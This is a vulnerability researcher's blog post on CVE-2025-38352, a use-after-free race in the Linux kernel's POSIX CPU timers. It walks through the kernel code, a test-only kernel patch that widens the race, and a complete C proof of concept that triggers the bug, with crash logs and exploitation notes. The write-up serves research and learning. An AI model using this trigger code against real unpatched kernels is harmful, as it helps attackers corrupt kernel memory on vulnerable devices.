CVE-2025-38352 was a race condition use-after-free vulnerability in the Linux kernel's POSIX CPU timers implementation that was reported to have been under limited, targeted exploitation in the wild:
An analysis of this vulnerability was already posted by @streypaws. Their blog post does a good job explaining how POSIX CPU timers work, and the conditions under which this vulnerability can be triggered. You can find it here:
https://streypaws.github.io/posts/Race-Against-Time-in-the-Kernel-Clockwork/
Since their blog post does not provide a proof of concept program that triggers the vulnerability, I decided to turn my Sunday night into a night of learning and write it myself.
This blog post provides a glimpse into how I approach analysing and writing PoCs for vulnerabilities. It also goes to showcase how invaluable such an approach is for learning new things.
Table of Contents
The PoC
In case you just want to see the PoC, you can find it here:
https://github.com/farazsth98/poc-CVE-2025-38352
The Patch Commit
The patch commit can be found here:
Testing Environment TL;DR
Kernel Version
I used the LTS kernel version 6.12.33, as that was the latest LTS release that was still vulnerable to this bug.
CONFIG_POSIX_CPU_TIMERS_TASK_WORK
The patch commit mentions that the vulnerability cannot be triggered if CONFIG_POSIX_CPU_TIMERS_TASK_WORK is set.
The blog post by @streypaws mentions that they were unable to toggle off the CONFIG_POSIX_CPU_TIMERS_TASK_WORK flag. This is because by default, this is an internal flag defined in kernel/time/Kconfig(link)
config HAVE_POSIX_CPU_TIMERS_TASK_WORK
bool
config POSIX_CPU_TIMERS_TASK_WORK
bool
default y if POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORKAnd HAVE_POSIX_CPU_TIMERS_TASK_WORK is set for both arch/x86/Kconfig and arch/arm64/Kconfig. Therefore, this vulnerability is actually only exploitable on 32-bit Android devices, which explains why it was described as being under limited, targeted exploitation in the wild.
In order to be able to toggle it off, make the following modification to POSIX_CPU_TIMERS_TASK_WORK in kernel/time/Kconfig:
config POSIX_CPU_TIMERS_TASK_WORK
bool "CVE-2025-38352: POSIX_CPU_TIMERS_TASK_WORK toggle" if EXPERT
depends on POSIX_TIMERS && HAVE_POSIX_CPU_TIMERS_TASK_WORK
default y
help
For CVE-2025-38352 analysis.Now, this flag will be toggle-able via make menuconfig.
For reference, I used the kernelCTF LTS config (link) as a base, and only made the above modification to be able to toggle off CONFIG_POSIX_CPU_TIMERS_TASK_WORK.
QEMU Setup
Since this is a race condition, it requires at least two CPUs to trigger. For my testing, I used a QEMU VM with 4 CPUs:
qemu-system-x86_64 \
-enable-kvm \
-cpu host \
-smp cores=4 \
# [ ... ]Vulnerability Recap
I highly recommend reading the blog post by @streypaws (link) at this point before continuing. I will only add to the information in that blog post in order to explain how to trigger it.
Every time a per-CPU scheduler tick occurs, the kernel calls run_posix_cpu_timers() on each CPU. This function ends up calling handle_posix_cpu_timers() if a timer is ready to fire.
The vulnerability occurs specifically because handle_posix_cpu_timers() is allowed to run even if a task has become a zombie (that is, the task's tsk->exit_state is set to EXIT_ZOMBIE).
Let's take a quick look at handle_posix_cpu_timers() to understand the vulnerability:
static void handle_posix_cpu_timers(struct task_struct *tsk)
{
struct k_itimer *timer, *next;
unsigned long flags, start;
LIST_HEAD(firing); // Faith: local list of timers
// Faith: acquire tsk->sighand->siglock
if (!lock_task_sighand(tsk, &flags))
return;
do {
// [ 1 ]
// Collect all firing timers into the `firing` list
check_thread_timers(tsk, &firing);
check_process_timers(tsk, &firing);
// [ ... ]
} while (!posix_cpu_timers_enable_work(tsk, start));
// Faith: release tsk->sighang->siglock
unlock_task_sighand(tsk, &flags);
// Faith: RACE WINDOW START
// [ 2 ]
// Faith: Iterate over the `firing` list and fire the timers
list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
// [ ... ]
// Faith: RACE WINDOW ENDs after the timer is finished being
// accessed.
}
}Referring to my own comments in the code above, and assuming there is only one firing timer:
- After acquiring the
tsk->sighand->siglock, it collects the firing timer and stores it in the localfiringlist. Notably, it removes the timer from the task at this point. - After the timer is collected,
tsk->sighand->siglockis dropped, and the function then iterates over the localfiringlist and fires the timer.
Now, if the task is a zombie task, then after the tsk->sighand->siglock is dropped, a race window opens up. Inside this race window, another process can do the following to free the timer that's in the firing list:
- Reap the zombie task - This can be done by a parent process using
waitpid(). - Call the
timer_delete()syscall - This will callposix_cpu_timer_del()and free the timer via RCU.
When the parent process reaps the zombie task, release_task() will be called on it, which will end up setting the tsk->sighand to NULL via __exit_signal():
static void __exit_signal(struct task_struct *tsk)
{
// [ ... ]
sighand = rcu_dereference_check(tsk->sighand,
lockdep_tasklist_lock_is_held());
spin_lock(&sighand->siglock);
// [ ... ]
tsk->sighand = NULL; // Faith: HERE
spin_unlock(&sighand->siglock);
// [ ... ]
}Then, when timer_delete() is used to call posix_cpu_timer_del(), it will notice that tsk->sighand is NULL, and just return 0:
static int posix_cpu_timer_del(struct k_itimer *timer)
{
// [ ... ]
int ret = 0;
// [ ... ]
sighand = lock_task_sighand(p, &flags);
if (unlikely(sighand == NULL)) {
WARN_ON_ONCE(ctmr->head || timerqueue_node_queued(&ctmr->node));
} else {
// [ ... ]
}
out:
// [ ... ]
return ret;
}When posix_cpu_timer_del() returns 0, it will return back to the timer_delete() syscall handler, which will call posix_timer_unhash_and_free() and free the timer:
SYSCALL_DEFINE1(timer_delete, timer_t, timer_id)
{
// [ ... ]
retry_delete:
// [ ... ]
// Faith: timer_delete_hook() calls posix_cpu_timer_del()
if (unlikely(timer_delete_hook(timer) == TIMER_RETRY)) {
/* Unlocks and relocks the timer if it still exists */
timer = timer_wait_running(timer, &flags);
goto retry_delete;
}
// [ ... ]
posix_timer_unhash_and_free(timer);
return 0;
}The actual freeing is done via RCU, so it does not happen immediately:
static void posix_timer_unhash_and_free(struct k_itimer *tmr)
{
// [ ... ]
posix_timer_free(tmr);
}
static void posix_timer_free(struct k_itimer *tmr)
{
// [ ... ]
call_rcu(&tmr->rcu, k_itimer_rcu_free);
}Assuming all of this occurs in the race window described above - when handle_posix_cpu_timers() iterates over the local firing list and accesses the timer, it will lead to a UAF:
static void handle_posix_cpu_timers(struct task_struct *tsk)
{
// [ ... ]
// Faith: Iterate over the `firing` list and fire the timers
list_for_each_entry_safe(timer, next, &firing, it.cpu.elist) {
// [ ... ]
// Faith: UAF occurs here
}
}Planning Out The PoC
Now that we know what to do to trigger the vulnerability, let's plan out a proof of concept step-by-step.
Minimal POSIX CPU Timer PoC
The first thing we want to do is be able to call into handle_posix_cpu_timers(). The following minimal PoC achieves that:
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
void timer_fire(void) {
printf("Timer fired\n");
}
int main(void) {
struct sigevent sev = {0};
sev.sigev_notify = SIGEV_THREAD;
sev.sigev_notify_function = (void (*)(sigval_t))timer_fire;
timer_t timer;
int timerfd = timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer);
printf("Timer created: %d\n", timerfd);
struct itimerspec ts = {
.it_interval = {0, 0},
.it_value = {1, 0},
};
timer_settime(timer, 0, &ts, NULL);
printf("Timer started: %d\n", timerfd);
// Use up CPU time to fire the timer
while (1);
}timer_create()is used to create a POSIX CPU timer that callstimer_fire()when it's fired.timer_settime()is used to make the timer fire after 1 second of CPU time is used up by the current thread.
Creating a Zombie Task
In order to understand how to transition a task into the EXIT_ZOMBIE exit state, let's take a look at exit_notify(), which is called via do_exit() when a thread / process has finished running and is exiting:
static void exit_notify(struct task_struct *tsk, int group_dead)
{
// [ ... ]
LIST_HEAD(dead);
// [ ... ]
tsk->exit_state = EXIT_ZOMBIE; // [ 1 ]
// [ ... ]
// [ 2 ]
if (unlikely(tsk->ptrace)) {
int sig = thread_group_leader(tsk) &&
thread_group_empty(tsk) &&
!ptrace_reparented(tsk) ?
tsk->exit_signal : SIGCHLD;
autoreap = do_notify_parent(tsk, sig);
}
// [ ... ]
// [ 3 ]
if (autoreap) {
tsk->exit_state = EXIT_DEAD;
list_add(&tsk->ptrace_entry, &dead);
}
// [ ... ]
// [ 4 ]
list_for_each_entry_safe(p, n, &dead, ptrace_entry) {
list_del_init(&p->ptrace_entry);
release_task(p);
}
}Referring to my annotations in the code above:
- The task's exit state is initially automatically set to
EXIT_ZOMBIE. - If the task is currently being ptraced,
autoreapis set to the return value ofdo_notify_parent().do_notify_parent()will return false as long as the parent process is not ignoringSIGCHLDsignals.
- If
autoreapis true, the task's exit state is set toEXIT_DEADinstead, and it is added to the localdeadlist. - The local
deadlist is iterated, andrelease_task()is called on each task on the list.
From our analysis in the previous section, we know that release_task() will set tsk->sighand to NULL.
Since we actually want handle_posix_cpu_timers() to be able to lock tsk->sighand->siglock and collect our firing timer in the local firing list, we do not want the task to be released here.
Therefore, in order to create a zombie task here, tsk->ptrace must be set, meaning that there must be a parent process ptracing this task. Additionally, the parent process must not be ignoring SIGCHLD signals.
Reaping a Zombie Task
In the context of threads and processes, "reaping" is the act of fully releasing and freeing a task (primarily the task structure allocated for it). The final reaping step is generally to get the kernel to call release_task() on the task.
A zombie task can be reaped by calling waitpid(zombie_task_pid, ...) in the parent ptracer process. The call stack we want is as follows:
do_wait()
-> __do_wait()
-> do_wait_pid()
-> wait_consider_task()
-> wait_task_zombie()
-> release_task()There is too much code to show in this call stack, so the following are the important conditions that we must meet to successfully reap the zombie task and call release_task() on it:
do_wait_pid()will only be called if we specify a PID (as opposed to a TGID, PGID, etc).wait_task_zombie()will only be called if the following conditions are met:- The zombie task is being ptraced.
- The zombie task is NOT the current thread group leader (by default, the thread group leader is the main thread of a process).
To meet the conditions above, the zombie task must be a non-main thread in a process that's being ptraced by a parent process.
Additionally, the parent process must specify the zombie task's thread ID (which is just a PID) to waitpid(), which means the child process has to communicate the thread ID to the parent process somehow.
Controlled Reaping of a Zombie Task
The following proof of concept demonstrates a parent process that has full control over when it reaps a non-main thread in a child process:
#define _GNU_SOURCE
#include <stdio.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <err.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
void pin_on_cpu(int i) {
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(i, &mask);
sched_setaffinity(0, sizeof(mask), &mask);
}
pthread_t reapee_thread;
pthread_barrier_t barrier;
int c2p[2]; // child to parent
int p2c[2]; // parent to child
void reapee(void) {
pin_on_cpu(2);
prctl(PR_SET_NAME, "REAPEE");
// Send this thread's TID to the parent process
pid_t tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));
// Wait for the parent to attach
pthread_barrier_wait(&barrier);
return;
}
int main(int argc, char *argv[]) {
// Parent and child setup
// Use pipes to communicate between parent and child
SYSCHK(pipe(c2p));
SYSCHK(pipe(p2c));
pid_t pid = SYSCHK(fork());
if (pid) {
// parent
pin_on_cpu(1);
char m;
close(c2p[1]);
close(p2c[0]);
// Receive child process's REAPEE thread'sTID
pid_t tid;
SYSCHK(read(c2p[0], &tid, sizeof(pid_t)));
printf("Parent: reapee thread ID: %d\n", tid);
// Attach to the REAPEE thread and continue it
printf("Parent: attaching to REAPEE thread\n");
SYSCHK(ptrace(PTRACE_ATTACH, tid, NULL, NULL));
SYSCHK(waitpid(tid, NULL, __WALL));
SYSCHK(ptrace(PTRACE_CONT, tid, NULL, NULL));
// Signal to child that we attached and continued
SYSCHK(write(p2c[1], &m, 1));
// Reap the REAPEE thread now
printf("Parent: press enter to reap REAPEE thread\n");
getchar();
SYSCHK(waitpid(tid, NULL, __WALL));
printf("Parent: detached from REAPEE\n");
sleep(5);
} else {
// child
pin_on_cpu(0);
char m;
close(c2p[0]);
close(p2c[1]);
prctl(PR_SET_NAME, "CHILD_MAIN");
pthread_barrier_init(&barrier, NULL, 2);
pthread_create(&reapee_thread, NULL, (void*)reapee, NULL);
printf("Thread created\n");
// Parent process writes to us when attached and continued, use
// a barrier to continue the REAPEE thread now
SYSCHK(read(p2c[0], &m, 1));
pthread_barrier_wait(&barrier);
pause();
}
}When running this PoC, attach GDB to the kernel after observing the following output:
Thread created
Parent: reapee thread ID: 152
Parent: attaching to REAPEE thread
Parent: press enter to reap REAPEE threadIn GDB, set a breakpoint at release_task() and continue. You can press enter at any point to trigger release_task():
gef> p p->comm
$1 = "REAPEE\000\000\000\000\000\000\000\000\000"
gef> bt
#0 release_task (p=p@entry=0xffff88800892d280) at kernel/exit.c:245
#1 0xffffffff811a549f in wait_task_zombie (p=0xffff88800892d280, wo=0xffffc90000627eb0) at kernel/exit.c:1254
#2 wait_consider_task (wo=wo@entry=0xffffc90000627eb0, ptrace=<optimized out>, ptrace@entry=0x1, p=0xffff88800892d280) at kernel/exit.c:1481
#3 0xffffffff811a6cd6 in do_wait_pid (wo=0xffffc90000627eb0) at kernel/exit.c:1629
#4 __do_wait (wo=wo@entry=0xffffc90000627eb0) at kernel/exit.c:1655
#5 0xffffffff811a6d86 in do_wait (wo=wo@entry=0xffffc90000627eb0) at kernel/exit.c:1696Note that release_task() can periodically be called to reap kworker threads. In that case, you can just ignore it and continue.
Writing the PoC
Now, let's finally write the PoC!
Kernel Patch To Extend The Race Window
In order to help trigger the bug, I added a 500ms delay inside handle_posix_cpu_timers() to extend the race window. It makes the PoC much more reliable:
static void handle_posix_cpu_timers(struct task_struct *tsk)
{
// [ ... ]
unlock_task_sighand(tsk, &flags);
// Faith: extend the race window
if (strcmp(tsk->comm, "SLOWME") == 0) {
printk("Faith: Did we win? tsk->exit_state: %d\n", tsk->exit_state);
mdelay(500);
}
// [ ... ]
}Note that this patch is not necessary to trigger the vulnerability. For example, you can completely fill up the local firing list, and ensure that the UAF occurs on the very last timer inside the list. This should provide enough time to trigger the UAF on the last timer without the patch (I just took a shortcut to save time).
Triggering the race condition
In order to trigger the race condition, we have to combine our two PoCs from the previous section together, and ensure that the POSIX CPU timer is set up such that it fires after exit_notify() transitions the tsk->exit_state to EXIT_ZOMBIE.
Effectively, this means that when the non-main thread in the child process exits, there must be just enough CPU time left for the kernel's do_exit() function to call exit_notify() and transition the task to a zombie task before the timer fires.
However, we cannot have too much CPU time left! Otherwise, do_exit() will finish executing and using up all the CPU time it needs, so the timer will end up never firing if it needs to use up even more CPU time after this point.
Through some trial and error, in my local environment, a value of 250,000 nanoseconds worth of CPU time ended up working well.
Now, let's walk through the important parts of the final PoC step-by-step (full PoC is shown at the end).
Custom Wait Time Implementation
First, I specified a custom wait_time via argv[1] for easier testing. This is the CPU time that must be used up before the timer fires:
long int wait_time = 250000; // Works for me
int main(int argc, char *argv[]) {
// Use a custom wait time to figure out the exact timing when the
// timer will fire right after `exit_notify()` sets the task's
// state to EXIT_ZOMBIE.
if (argc > 1) {
wait_time = strtol(argv[1], NULL, 10);
printf("Custom wait time: %ld\n", wait_time);
}Setting Up The Timer
Now, in the reapee thread, create a POSIX CPU timer and set it to fire after the custom wait_time.
Ensure to also set the thread's name to SLOWME so that it is affected by the custom mdelay() patch we added to handle_posix_cpu_timers():
void reapee(void) {
pin_on_cpu(2);
struct sigevent sev = {0};
sev.sigev_notify = SIGEV_THREAD;
sev.sigev_notify_function = (void (*)(sigval_t))timer_fire;
char m;
prctl(PR_SET_NAME, "SLOWME");
// Send this thread's TID to the parent process
pid_t tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));
printf("Creating timer\n");
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer));
printf("Timer created\n");
struct itimerspec ts = {
.it_interval = {0, 0},
.it_value = {0, wait_time}, // Custom wait time
};
// Wait for parent to attach
pthread_barrier_wait(&barrier);
SYSCHK(timer_settime(timer, 0, &ts, NULL));
// Use some CPU time to make sure the timer will fire correctly
for (int i = 0; i < 1000000; i++);
return;
}Reaping The Timer Thread And Deleting The Timer
Finally, inside the parent and child processes, we must do the following:
- Parent process - Reap the REAPEE thread the same as before, and wait for the child to free the timer.
- Child process - Wait for the parent process to reap the REAPEE thread, then use
timer_delete()to delete the timer.
int main(int argc, char *argv[]) {
// [ ... ]
pid_t pid = SYSCHK(fork());
if (pid) {
// parent
// [ ... ]
// Signal to child that we attached and continued
SYSCHK(write(p2c[1], &m, 1));
// Reap the REAPEE thread now
printf("Parent: reaping REAPEE thread\n");
SYSCHK(waitpid(tid, NULL, __WALL));
printf("Parent: detached from REAPEE\n");
// Let the child process know REAPEE is reaped
SYSCHK(write(p2c[1], &m, 1));
// Let the child process delete and free the timer
// before exiting
SYSCHK(read(c2p[0], &m, 1));
} else {
// child
// [ ... ]
// Parent process writes to us when attached and continued, use
// a barrier to continue the REAPEE thread now
SYSCHK(read(p2c[0], &m, 1));
pthread_barrier_wait(&barrier);
// Parent process writes to us when waitpid() returns successfully.
//
// At this point, if we won the race, `handle_posix_cpu_timers()` will be in
// the patched `mdelay(500)` with `tsk->exit_state != 0`, and calling
// `timer_delete()` should make it see a NULL `sighand`, which will cause it to
// just free the timer unconditionally.
SYSCHK(read(p2c[0], &m, 1));
timer_delete(timer);
printf("Child: timer deleted\n");
// Let the timer be freed by RCU, then let the parent process know it can exit
wait_for_rcu();
SYSCHK(write(c2p[1], &m, 1));
pause();
}
}Testing The PoC
And that's it! The steps to run this PoC are as follows:
- Compile using
gcc -o poc -static poc.c - Run using
while true; do /poc; donein the VM.
Note that the PoC does not hit the race condition 100% of the time, which is why I repeat it until it hits with the bash while loop.
You should modify the default wait_time to a value that works in your testing environment first.
Now, let's look at what the KASAN and non-KASAN splats look like 👀
KASAN Splat
With KASAN enabled, a UAF write can be observed:
[ 9.995817] ==================================================================
[ 9.999410] BUG: KASAN: slab-use-after-free in posix_timer_queue_signal+0x16a/0x1a0
[ 10.003168] Write of size 4 at addr ffff88800e628188 by task SLOWME/179
[ 10.006386]
[ 10.007400] CPU: 2 UID: 0 PID: 179 Comm: SLOWME Not tainted 6.12.33 #7
[ 10.007406] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 10.007408] Call Trace:
[ 10.007455] <IRQ>
[ 10.007468] dump_stack_lvl+0x66/0x80
[ 10.007487] print_report+0xc1/0x610
[ 10.007503] ? posix_timer_queue_signal+0x16a/0x1a0
[ 10.007506] kasan_report+0xaf/0xe0
[ 10.007509] ? posix_timer_queue_signal+0x16a/0x1a0
[ 10.007512] posix_timer_queue_signal+0x16a/0x1a0
[ 10.007515] cpu_timer_fire+0x8d/0x190
[ 10.007518] run_posix_cpu_timers+0x807/0x1840Non-KASAN Splat
With KASAN disabled, a WARN_ON_ONCE inside send_sigqueue() can be observed:
[ 29.647984] ------------[ cut here ]------------
[ 29.650267] WARNING: CPU: 2 PID: 205 at kernel/signal.c:1974 send_sigqueue+0x1be/0x250
[ 29.653905] Modules linked in:
[ 29.655484] CPU: 2 UID: 0 PID: 205 Comm: SLOWME Not tainted 6.12.33 #5
[ 29.658569] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.15.0-1 04/01/2014
[ 29.662579] RIP: 0010:send_sigqueue+0x1be/0x250
[ 29.664712] Code: 44 89 e0 5b 5d 41 5c 41 5d 41 5e 41 5f e9 d5 e9 94 01 41 bc ff ff ff ff eb e2 48 8b 85 b0 07 00 00 48 8d 50 40 e9 2a ff ff ff <0f> 0b 45 31 e4 eb cb 0f 0b eb c7 4c 89 fe e8 bf 47 6a 01 48 8b bd
// [ ... ] Register states snipped out
[ 29.703210] Call Trace:
[ 29.704498] <IRQ>
[ 29.705663] posix_timer_queue_signal+0x3f/0x50
[ 29.707869] cpu_timer_fire+0x23/0x70
[ 29.709572] run_posix_cpu_timers+0x2bc/0x5e0Quick Note on CONFIG_POSIX_CPU_TIMERS_TASK_WORK
The blog post by @streypaws (link) mentions being able to hit this vulnerability even with CONFIG_POSIX_CPU_TIMERS_TASK_WORK enabled. However, I was not able to observe the same results.
In fact, after looking at what exit_task_work() does in do_exit(), it makes sense why the vulnerability cannot be triggered with CONFIG_POSIX_CPU_TIMERS_TASK_WORK enabled:
exit_task_work()callstask_work_run().task_work_run()"poisons" thetask->task_worksstructure, preventing any further work from being queued on it.
Since the vulnerability specifically requires exit_notify() to be called before handle_posix_cpu_timers(), and exit_task_work() (which calls handle_posix_cpu_timers() if it's enqueued) is called before exit_notify(), it is not possible to trigger this vulnerability with CONFIG_POSIX_CPU_TIMERS_TASK_WORK enabled.
Exploitation
I'm not sure if I will spend time writing an exploit for this vulnerability, but I did note the following:
- POSIX CPU timers are allocated out of their own
kmem_cache. - The
struct k_itimerstructure is not really that complex, so cross-cache is likely necessary. - For cross-cache, the race window inside
handle_posix_cpu_timers()likely needs to be extended. - Extending the race window may be tricky given that
handle_posix_cpu_timers()runs in the scheduler tick interrupt context, where IRQs are disabled.
My PoC already provides a UAF primitive, and obviously, if we go off of what the Android bulletin mentions, this vulnerability is definitely exploitable. It's just a matter of solving the exploit engineering problems above.
If I end up spending time on exploiting this vulnerability, I will update this blog post with the details 😄
Conclusion
As I've mentioned in a previous blog post, my opinion is that analyzing and writing PoCs for complicated vulnerabilities is the best way to learn and conduct vulnerability research.
In this case, not only did I learn about POSIX CPU timers, but I learned how timers work in general, as well as how processes and threads are described via task structures in the Linux kernel.
If you have any questions, please let me know via Twitter or wherever else!
Final PoC
The final PoC is uploaded on my Github. You can view it here:
https://github.com/farazsth98/poc-CVE-2025-38352
It is also shown below:
#define _GNU_SOURCE
#include <time.h>
#include <signal.h>
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/ptrace.h>
#include <sys/wait.h>
#include <sys/types.h>
#include <stdlib.h>
#include <err.h>
#include <sys/prctl.h>
#include <sched.h>
#include <linux/membarrier.h>
#include <sys/syscall.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
void pin_on_cpu(int i) {
cpu_set_t mask;
CPU_ZERO(&mask);
CPU_SET(i, &mask);
sched_setaffinity(0, sizeof(mask), &mask);
}
void timer_fire(void) {
prctl(PR_SET_NAME, "TIMER_FIRED");
printf("Timer fired\n");
}
void wait_for_rcu() {
syscall(__NR_membarrier, MEMBARRIER_CMD_GLOBAL, 0);
}
pthread_barrier_t barrier;
timer_t timer;
pthread_t reapee_thread;
int c2p[2]; // child to parent
int p2c[2]; // parent to child
long int wait_time = 250000;
void reapee(void) {
pin_on_cpu(2);
struct sigevent sev = {0};
sev.sigev_notify = SIGEV_THREAD;
sev.sigev_notify_function = (void (*)(sigval_t))timer_fire;
char m;
prctl(PR_SET_NAME, "SLOWME");
// Send this thread's TID to the parent process
pid_t tid = (pid_t)syscall(SYS_gettid);
SYSCHK(write(c2p[1], &tid, sizeof(pid_t)));
printf("Creating timer\n");
SYSCHK(timer_create(CLOCK_THREAD_CPUTIME_ID, &sev, &timer));
printf("Timer created\n");
struct itimerspec ts = {
.it_interval = {0, 0},
.it_value = {
.tv_sec = 0,
.tv_nsec = wait_time, // Custom wait time
},
};
// Wait for parent to attach
pthread_barrier_wait(&barrier);
SYSCHK(timer_settime(timer, 0, &ts, NULL));
// Use some CPU time to make sure the timer will fire correctly
for (int i = 0; i < 1000000; i++);
return;
}
int main(int argc, char *argv[]) {
// Use a custom wait time to figure out the exact timing when the
// timer will fire right after `exit_notify()` sets the task's
// state to EXIT_ZOMBIE.
if (argc > 1) {
wait_time = strtol(argv[1], NULL, 10);
printf("Custom wait time: %ld\n", wait_time);
}
// Parent and child setup
// Use pipes to communicate between parent and child
SYSCHK(pipe(c2p));
SYSCHK(pipe(p2c));
pid_t pid = SYSCHK(fork());
if (pid) {
// parent
pin_on_cpu(1);
char m;
close(c2p[1]);
close(p2c[0]);
// Receive child process's REAPEE thread'sTID
pid_t tid;
SYSCHK(read(c2p[0], &tid, sizeof(pid_t)));
printf("Parent: reapee thread ID: %d\n", tid);
// Attach and continue
printf("Parent: attaching to REAPEE thread\n");
SYSCHK(ptrace(PTRACE_ATTACH, tid, NULL, NULL));
SYSCHK(waitpid(tid, NULL, __WALL));
SYSCHK(ptrace(PTRACE_CONT, tid, NULL, NULL));
// Signal to child that we attached and continued
SYSCHK(write(p2c[1], &m, 1));
// Reap the REAPEE thread now
printf("Parent: reaping REAPEE thread\n");
SYSCHK(waitpid(tid, NULL, __WALL));
printf("Parent: detached from REAPEE\n");
// Let the child process know REAPEE is reaped
SYSCHK(write(p2c[1], &m, 1));
// Let the child process delete and free the timer
// before exiting
SYSCHK(read(c2p[0], &m, 1));
} else {
// child
pin_on_cpu(0);
char m;
close(c2p[0]);
close(p2c[1]);
prctl(PR_SET_NAME, "CHILD_MAIN");
pthread_barrier_init(&barrier, NULL, 2);
pthread_create(&reapee_thread, NULL, (void*)reapee, NULL);
printf("Thread created\n");
// Parent process writes to us when attached and continued, use
// a barrier to continue the REAPEE thread now
SYSCHK(read(p2c[0], &m, 1));
pthread_barrier_wait(&barrier);
// Parent process writes to us when waitpid() returns successfully.
//
// At this point, if we won the race, `handle_posix_cpu_timers()` will be in
// the patched `mdelay(500)` with `tsk->exit_state != 0`, and calling
// `timer_delete()` should make it see a NULL `sighand`, which will cause it to
// just free the timer unconditionally.
SYSCHK(read(p2c[0], &m, 1));
timer_delete(timer);
printf("Child: timer deleted\n");
// Let the timer be freed by RCU, then let the parent process know it can exit
wait_for_rcu();
SYSCHK(write(c2p[1], &m, 1));
pause();
}
}